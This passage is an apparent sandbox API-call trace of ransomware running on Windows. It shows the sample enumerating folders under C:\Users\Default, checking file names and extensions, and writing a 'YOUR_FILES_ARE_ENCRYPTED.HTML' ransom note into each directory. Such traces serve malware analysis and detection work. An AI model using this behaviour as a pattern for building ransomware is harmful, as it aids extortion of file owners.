hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89642899, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows", cAlternateFileName="")) returned 1 [0171.192] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89642899, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows", cAlternateFileName="")) returned 0 [0171.192] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0171.192] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0171.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600 [0171.193] WriteFile (in: hFile=0x600, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0171.196] CloseHandle (hObject=0x600) returned 1 [0171.197] GetProcessHeap () returned 0x270000 
[0171.197] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0171.204] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0171.204] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.204] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0171.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.206] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.209] CloseHandle (hObject=0x5f8) returned 1 [0171.209] GetProcessHeap () returned 0x270000 [0171.210] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.211] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, 
ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Roaming", cAlternateFileName="")) returned 0 [0171.212] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.212] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 58 [0171.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.213] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.216] CloseHandle (hObject=0x5a0) returned 1 [0171.217] GetProcessHeap () returned 0x270000 [0171.218] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.218] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175c6d1c, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175c6d1c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175c6d1c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0171.218] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Application Data") returned 37 [0171.218] 
GetProcessHeap () returned 0x270000 [0171.218] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.218] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\Default\\Application Data") returned="\\\\?\\C:\\Users\\Default\\Application Data" [0171.218] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Application Data\\*") returned="\\\\?\\C:\\Users\\Default\\Application Data\\*" [0171.218] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Roaming", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.218] GetProcessHeap () returned 0x270000 [0171.219] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.220] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Contacts", cAlternateFileName="")) returned 1 [0171.220] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts") returned 29 [0171.220] GetProcessHeap () returned 
0x270000 [0171.220] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.220] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Contacts" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts") returned="\\\\?\\C:\\Users\\Default\\Contacts" [0171.220] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Contacts", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\*") returned="\\\\?\\C:\\Users\\Default\\Contacts\\*" [0171.220] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.221] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.221] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8143b5e9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0171.221] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0171.221] lstrcmpW (lpString1="Administrator.contact", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.221] PathFindExtensionW (pszPath="Administrator.contact") returned=".contact" [0171.221] lstrlenW (lpString=".contact") returned 8 [0171.221] PathFindExtensionW (pszPath="Administrator.contact") returned=".contact" [0171.221] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.221] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0171.221] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.221] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.222] lstrlenW (lpString=".ini") returned 4 [0171.222] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.222] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x19c, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.222] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.222] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0171.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\contacts\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.224] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.226] CloseHandle (hObject=0x5a0) returned 1 [0171.227] GetProcessHeap () returned 0x270000 [0171.228] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.228] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175ece7c, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175ece7c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175ece7c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Cookies", cAlternateFileName="")) returned 1 [0171.228] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Cookies") returned 28 [0171.228] GetProcessHeap () returned 0x270000 [0171.228] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.228] lstrcpyW (in: lpString1=0x74fa010, 
lpString2="\\\\?\\C:\\Users\\Default\\Cookies" | out: lpString1="\\\\?\\C:\\Users\\Default\\Cookies") returned="\\\\?\\C:\\Users\\Default\\Cookies" [0171.228] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Cookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Cookies\\*") returned="\\\\?\\C:\\Users\\Default\\Cookies\\*" [0171.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.228] GetProcessHeap () returned 0x270000 [0171.230] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.230] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Desktop", cAlternateFileName="")) returned 1 [0171.230] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop") returned 28 [0171.230] GetProcessHeap () returned 0x270000 [0171.230] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.230] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Desktop" | out: 
lpString1="\\\\?\\C:\\Users\\Default\\Desktop") returned="\\\\?\\C:\\Users\\Default\\Desktop" [0171.230] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop\\*") returned="\\\\?\\C:\\Users\\Default\\Desktop\\*" [0171.230] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.230] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.231] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.231] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned 40 [0171.231] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.231] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.231] lstrlenW (lpString=".ini") returned 4 [0171.231] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.231] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.231] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.231] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 58 [0171.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\desktop\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.232] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.234] CloseHandle (hObject=0x5a0) returned 1 [0171.235] GetProcessHeap () returned 0x270000 [0171.236] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.236] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: 
lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0171.236] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents") returned 30 [0171.236] GetProcessHeap () returned 0x270000 [0171.236] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.236] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Documents" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents") returned="\\\\?\\C:\\Users\\Default\\Documents" [0171.236] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\*") returned="\\\\?\\C:\\Users\\Default\\Documents\\*" [0171.236] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.238] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, 
ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.238] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f4ea6f, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.238] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0171.238] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.238] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.238] lstrlenW (lpString=".ini") returned 4 [0171.238] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.238] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175548fb, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175548fb, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175548fb, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0171.238] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Music") returned 39 [0171.238] GetProcessHeap () returned 0x270000 [0171.238] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 
[0171.238] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\My Music" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Music") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Music" [0171.238] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*" [0171.238] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x74fa010, ftCreationTime.dwLowDateTime=0x431df40, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdbb4, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="ꀐݏ")) returned 0xffffffff [0171.239] GetProcessHeap () returned 0x270000 [0171.240] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.240] FindNextFileW 